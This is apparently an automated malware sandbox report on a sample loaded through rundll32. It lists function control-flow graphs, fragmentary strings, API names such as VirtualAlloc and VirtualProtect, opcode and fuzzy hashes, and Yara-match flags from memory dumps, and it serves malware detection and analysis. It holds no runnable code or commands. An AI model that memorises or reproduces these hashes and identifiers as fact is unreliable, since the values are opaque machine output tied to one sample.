14e051a098d-14e051a098f 113->124 114->112 115->99 116->99 125 14e051a06ab-14e051a06b3 116->125 117->115 126 14e051a09d9-14e051a09e9 VirtualProtect 118->126 127 14e051a09cd-14e051a09d3 118->127 119->95 139 14e051a0900-14e051a0905 119->139 120->120 120->121 121->119 131 14e051a0999-14e051a09a0 124->131 132 14e051a0991-14e051a0997 124->132 125->115 126->75 127->126 134 14e051a07db-14e051a07e1 129->134 135 14e051a07e3-14e051a07f0 129->135 136 14e051a083b 130->136 137 14e051a0844-14e051a0850 130->137 131->118 132->112 140 14e051a0812-14e051a082c 134->140 141 14e051a07fb-14e051a080d 135->141 142 14e051a07f2-14e051a07f9 135->142 136->137 137->92 138 14e051a0856-14e051a0857 137->138 138->81 139->96 140->130 144 14e051a082e-14e051a0833 140->144 141->140 142->141 142->142 144->129
                                                                                                                                APIs
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240752664.0000014E051A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000014E051A0000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_14e051a0000_rundll32.jbxd
                                                                                                                                Similarity
                                                                                                                                • API ID: Virtual$Alloc$FunctionInfoNativeProtectSystemTable
                                                                                                                                • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                                • API String ID: 394283112-2517549848
                                                                                                                                • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction ID: 9fce8db5c99b4c9a07128aa5868b493946773de34f43bda5b67a934a5238c262
                                                                                                                                • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                                • Instruction Fuzzy Hash: 1E72D430618E488BDB69DF18C8897F9B7E1FB98308F10462DE89AC3251DB74D546CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018002C058 Relevance: 10.4, Strings: 8, Instructions: 370COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: #C$(I$-:$Ekf$<W$Z$l$l
                                                                                                                                • API String ID: 0-464535774
                                                                                                                                • Opcode ID: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction ID: edc4d0e98499d5b5adff65828f8d1fd2ac7ce79502a6533da94e18623254a36a
                                                                                                                                • Opcode Fuzzy Hash: d8792019bb8cd892c5e2cff0ba87425d7977148afb5a5f987cda1e45d5ff9126
                                                                                                                                • Instruction Fuzzy Hash: C102E3B151038CDBCB99DF28C8CAADD3BA1FB48398F956219FD0697260D774D884CB85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180010FF4 Relevance: 7.9, Strings: 6, Instructions: 363COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 180 180010ff4-180011016 181 180011020 180->181 182 180011022-180011028 181->182 183 180011814 182->183 184 18001102e-180011034 182->184 185 180011819-18001181f 183->185 186 1800114e2-1800114ec 184->186 187 18001103a-180011040 184->187 185->182 188 180011825-180011832 185->188 191 1800114f5-18001151d 186->191 192 1800114ee-1800114f3 186->192 189 1800113e2-1800114d2 call 180008200 187->189 190 180011046-18001104c 187->190 189->188 199 1800114d8-1800114dd 189->199 190->185 194 180011052-18001120b call 180021040 call 1800291ac 190->194 195 180011523-1800117f4 call 180016314 call 1800291ac call 18001e2bc 191->195 192->195 207 180011212-1800113d7 call 1800291ac call 18001e2bc 194->207 208 18001120d 194->208 209 1800117f9-180011803 195->209 199->182 207->188 215 1800113dd 207->215 208->207 209->188 212 180011805-18001180f 209->212 212->182 215->181
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )|x$/Zb$/v|$OV4T$\$lA
                                                                                                                                • API String ID: 0-3528011396
                                                                                                                                • Opcode ID: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction ID: 5dbdb21e6b24644f90705741d0e2e2cc24c858ca1caac6c8284349b4f9dc1789
                                                                                                                                • Opcode Fuzzy Hash: 74ea3d61a93069fa3a56a5f8f60d4b0c7eeb5b014d6ac06c6862fd203c8e6463
                                                                                                                                • Instruction Fuzzy Hash: 8C2204705097C8CBDBBECF64C885BDA7BA8FB44B08F10521DEA4A9E258DB745744CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180021618 Relevance: 7.8, Strings: 6, Instructions: 266COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 216 180021618-180021653 217 180021655-18002165a 216->217 218 180021bf3-180021c25 217->218 219 180021660-180021665 217->219 220 180021c2a-180021c2f 218->220 221 180021a81-180021bda call 180016314 219->221 222 18002166b-180021670 219->222 224 180021838-180021845 220->224 225 180021c35 220->225 228 180021bdf-180021bee 221->228 226 1800219f3-180021a7c call 180001b1c 222->226 227 180021676-18002167b 222->227 225->217 226->217 229 1800219e4-1800219ee 227->229 230 180021681-180021686 227->230 228->217 229->217 232 1800219d5-1800219df call 18001dfb4 230->232 233 18002168c-180021691 230->233 232->217 235 180021697-18002169c 233->235 236 18002190c-1800219a5 call 18000abac 233->236 239 1800216a2-1800216a7 235->239 240 180021846-180021907 call 180021434 235->240 243 1800219aa-1800219b0 236->243 239->220 244 1800216ad-180021835 call 180008200 call 1800166c0 239->244 240->217 246 1800219b2-1800219c6 243->246 247 1800219cb-1800219d0 243->247 244->224 246->217 247->217
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $&.+$)O$.pN$F>9$t(/
                                                                                                                                • API String ID: 0-3036092626
                                                                                                                                • Opcode ID: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction ID: e4baced68933c0a0796cf32b330105f1a6d3ed4de4784e8c7f389f9334031704
                                                                                                                                • Opcode Fuzzy Hash: 549a8b626face2190b4149bba4d09d4cb88f6d29378e8937dde350adb7fd5a83
                                                                                                                                • Instruction Fuzzy Hash: E6E109716093C89FEBBACF24C8897DE7BA1FB59344F50421DD88A8E250DB745B49CB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000C608 Relevance: 5.6, Strings: 4, Instructions: 616COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 252 18000c608-18000c62d 253 18000c632-18000c637 252->253 254 18000cc8a-18000cc8f 253->254 255 18000c63d 253->255 256 18000cc95-18000cc9a 254->256 257 18000cf2b-18000cfaf call 18001f7c0 call 18001c32c 254->257 258 18000c643-18000c648 255->258 259 18000cb7d-18000cc23 call 1800269b0 call 18001c32c 255->259 261 18000ce33-18000ced7 call 180008ad8 call 18001c32c 256->261 262 18000cca0-18000cca5 256->262 284 18000cfb4-18000d00a call 1800194a4 257->284 263 18000caa5-18000cb78 call 1800176b8 call 18001c32c call 1800194a4 258->263 264 18000c64e-18000c653 258->264 286 18000cc28-18000cc85 call 1800194a4 259->286 300 18000cedc-18000cf26 call 1800194a4 261->300 269 18000cd35-18000cdce call 18000703c call 18001c32c 262->269 270 18000ccab-18000ccb0 262->270 263->253 272 18000c9c1-18000ca52 call 18002870c call 18001c32c 264->272 273 18000c659-18000c65e 264->273 309 18000cdd3-18000ce2e call 1800194a4 269->309 279 18000ccb6-18000cd30 call 180021434 270->279 280 18000d00f-18000d014 270->280 311 18000ca57-18000caa0 call 1800194a4 272->311 282 18000c664-18000c669 273->282 283 18000c8bb-18000c963 call 180002610 call 18001c32c 273->283 279->253 280->253 288 18000d01a-18000d020 280->288 292 18000c7b2-18000c85a call 180019618 call 18001c32c 282->292 293 18000c66f-18000c674 282->293 316 18000c968-18000c9bc call 1800194a4 283->316 284->280 286->253 325 18000c85f-18000c8b6 call 1800194a4 292->325 293->280 303 18000c67a-18000c73d call 180002178 call 18001c32c 293->303 300->253 326 18000c742-18000c7ad call 1800194a4 303->326 309->253 311->253 316->253 325->253 326->253
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: +#;)$K'$sf$w\H
                                                                                                                                • API String ID: 0-1051058546
                                                                                                                                • Opcode ID: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction ID: 30c6111824d62709d88844cae5ccd518ea343406d57bec7882368cdc1c6a6611
                                                                                                                                • Opcode Fuzzy Hash: 6c53062de77b202a7a918e5f4038520a98252693d28bf41343123917f80ba32c
                                                                                                                                • Instruction Fuzzy Hash: 8362F97050068D8FDB48DF28C89A6DD3FA1FB58388F524229FC4AA7251D778D999CBC4
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001E3AC Relevance: 4.0, Strings: 3, Instructions: 215COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: <4P$<8$<w.
                                                                                                                                • API String ID: 0-1030867500
                                                                                                                                • Opcode ID: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction ID: 97d266913d6b0fd63d839b3c54903fd41a2ccd22a8a26fffcb9587bfe3b6431f
                                                                                                                                • Opcode Fuzzy Hash: 6c4ff939f0d35883aefbb319d4430fd67387b4e339adb0f797cabce8c6a4bf31
                                                                                                                                • Instruction Fuzzy Hash: C8B1E17151A384ABD788CF28C1C994BBBE1FBD4754F906A1DF8C68B260D7B0D948CB02
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180009100 Relevance: .1, Instructions: 125COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID:
                                                                                                                                • API String ID:
                                                                                                                                • Opcode ID: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction ID: 281782cf28aa09d34d334260f991d1b96cfbd8271b51b9b7c31761fd0664cb75
                                                                                                                                • Opcode Fuzzy Hash: 9400724a362ecc304d993d2fe4c896d101fab294f6d1cf34a07a96bc2a8ce181
                                                                                                                                • Instruction Fuzzy Hash: 4B51EC715087889BCBB8DF18C9856CA7BF0FF95704F50891DE9898B250DF719A44DB42
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Non-executed Functions

                                                                                                                                Function 0000000180022010 Relevance: 9.0, Strings: 7, Instructions: 235COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 358 180022010-18002203b 359 18002203d-180022043 358->359 360 180022338-1800223a1 call 18001455c 359->360 361 180022049-18002204f 359->361 368 1800223a6-1800223ac 360->368 362 180022055-18002205b 361->362 363 18002232e-180022333 361->363 366 180022061-180022067 362->366 367 1800222be-180022329 call 180019cb4 362->367 363->359 370 180022069-18002206f 366->370 371 18002209a-1800222b9 call 18001dbe8 call 180012320 call 1800194a4 366->371 367->359 368->359 372 1800223b2-1800223c2 368->372 370->368 375 180022075-180022083 370->375 371->368 376 180022089-18002208d 375->376 378 180022085-180022086 376->378 379 18002208f-180022098 376->379 378->376 379->359
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                                                                                • API String ID: 0-2447245168
                                                                                                                                • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                                                                                • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                                                                                • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800059B8 Relevance: 7.9, Strings: 6, Instructions: 408COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 568 1800059b8-180005a02 569 180005a04-180005a09 568->569 570 180006107-1800061a6 call 180001b1c 569->570 571 180005a0f-180005a14 569->571 583 1800061ab-1800061b0 570->583 572 180005a1a-180005a1f 571->572 573 180005fcd-180006102 call 180016314 571->573 576 180005a25-180005a2a 572->576 577 180005da6-180005fb1 call 1800093f0 572->577 573->569 581 1800061bb-18000625a call 180001b1c 576->581 582 180005a30-180005a35 576->582 590 180005fc3-180005fc8 577->590 591 180005fb3-180005fbe 577->591 588 18000625f-180006271 581->588 585 180005a3b-180005a40 582->585 586 180005d7e-180005d8c 582->586 587 1800061b6 583->587 583->588 592 180005a46-180005a4b 585->592 593 180005b78-180005d79 call 180009f5c call 18000a62c call 1800194a4 585->593 594 180005d92-180005d96 586->594 587->569 590->569 591->569 598 180005a51-180005a56 592->598 599 180005ad8-180005b68 call 18000abac 592->599 593->569 595 180005d98-180005da1 594->595 596 180005d8e-180005d8f 594->596 595->569 596->594 598->583 602 180005a5c-180005ad3 call 180007958 598->602 599->588 607 180005b6e-180005b73 599->607 602->569 607->569
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                                                                                • API String ID: 0-2100131636
                                                                                                                                • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                                                                                • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                                                                                • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180013780 Relevance: 7.8, Strings: 6, Instructions: 323COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 611 180013780-1800137f4 call 1800142a0 614 1800137fb-180013800 611->614 615 180013806-18001380b 614->615 616 180013c55-180013ce4 call 18002620c 614->616 617 180013811-180013816 615->617 618 180013c4b-180013c50 615->618 625 180013ce6-180013ceb 616->625 626 180013cf0 616->626 620 18001381c-180013821 617->620 621 1800138cd-180013c46 call 180006664 call 18000bb28 call 18002a6c8 call 1800194a4 617->621 618->614 623 180013cf5-180013cfa 620->623 624 180013827-1800138a9 call 18000290c 620->624 621->614 629 1800138ae-1800138cc 623->629 630 180013d00 623->630 624->629 625->614 626->623 630->614
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                                                                                • API String ID: 0-2401169580
                                                                                                                                • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                                                                                • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                                                                                • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000FC48 Relevance: 6.7, Strings: 5, Instructions: 447COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: )#?$EX.$PT$UbA$2f
                                                                                                                                • API String ID: 0-1318892062
                                                                                                                                • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                                                                                • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                                                                                • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018001FC0C Relevance: 6.6, Strings: 5, Instructions: 400COMMON
                                                                                                                                Download Yara Rule

                                                                                                                                Control-flow Graph

                                                                                                                                • Executed
                                                                                                                                • Not Executed
                                                                                                                                control_flow_graph 676 18001fc0c-18001fc44 call 1800142a0 679 18001fc46-18001fc4b 676->679 680 18001fc51 679->680 681 18001ff13-18001ff18 679->681 682 18001fe94-18001ff0e call 180012598 680->682 683 18001fc57-18001fc5c 680->683 684 180020169-1800201f9 call 1800190d4 681->684 685 18001ff1e-18001ff23 681->685 682->679 687 18001fc62-18001fc67 683->687 688 18001fde5-18001fe8f call 180012598 683->688 702 1800201fe-180020203 684->702 689 1800200b6-180020164 call 180012598 685->689 690 18001ff29-18001ff2e 685->690 695 18002020a-18002026b call 1800190d4 687->695 696 18001fc6d-18001fc72 687->696 688->679 689->679 698 1800200a1-1800200b1 call 1800014f8 690->698 699 18001ff34-18001ff39 690->699 711 180020270-180020291 695->711 706 18001fc78-18001fc7d 696->706 707 18001fd57-18001fde0 call 180012598 696->707 698->679 700 180020003-180020091 call 180021434 699->700 701 18001ff3f-18001ff44 699->701 700->711 723 180020097-18002009c 700->723 701->702 709 18001ff4a-18001fffe call 180012598 701->709 710 180020205 702->710 702->711 715 18001fc83-18001fc88 706->715 716 18001fd1f-18001fd52 706->716 707->679 709->679 710->679 715->702 720 18001fc8e-18001fd1a call 18001e938 715->720 716->679 720->679 723->679
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: $T$?F$QP|m$qjf$tZp
                                                                                                                                • API String ID: 0-3477398917
                                                                                                                                • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                                                                                • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                                                                                • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180016D3C Relevance: 6.6, Strings: 5, Instructions: 379COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: JQ$k&($t$v$x\J
                                                                                                                                • API String ID: 0-1134872184
                                                                                                                                • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                                                                                • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                                                                                • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 000000018000703C Relevance: 6.3, Strings: 5, Instructions: 87COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: R$)H8$?rIc$L==$V
                                                                                                                                • API String ID: 0-2512384441
                                                                                                                                • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                                                                                • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                                                                                • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800119A8 Relevance: 6.3, Strings: 5, Instructions: 63COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: Qq$bt$vird$+$S
                                                                                                                                • API String ID: 0-3373980505
                                                                                                                                • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                                                                                • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                                                                                • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 0000000180011AD0 Relevance: 5.3, Strings: 4, Instructions: 335COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: V$@$P9$^_"
                                                                                                                                • API String ID: 0-1880944046
                                                                                                                                • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                                                                                • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                                                                                • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                Function 00000001800132F0 Relevance: 5.3, Strings: 4, Instructions: 312COMMON
                                                                                                                                Download Yara Rule
                                                                                                                                Strings
                                                                                                                                Memory Dump Source
                                                                                                                                • Source File: 00000003.00000002.240313727.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                • Snapshot File: hcaresult_3_2_180001000_rundll32.jbxd
                                                                                                                                Yara matches
                                                                                                                                Similarity
                                                                                                                                • API ID:
                                                                                                                                • String ID: =_$F)k$b/$syG
                                                                                                                                • API String ID: 0-3955183656
                                                                                                                                • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                                                                                • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                                                                                • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                                                                                Uniqueness

                                                                                                                                Uniqueness Score: -1.00%

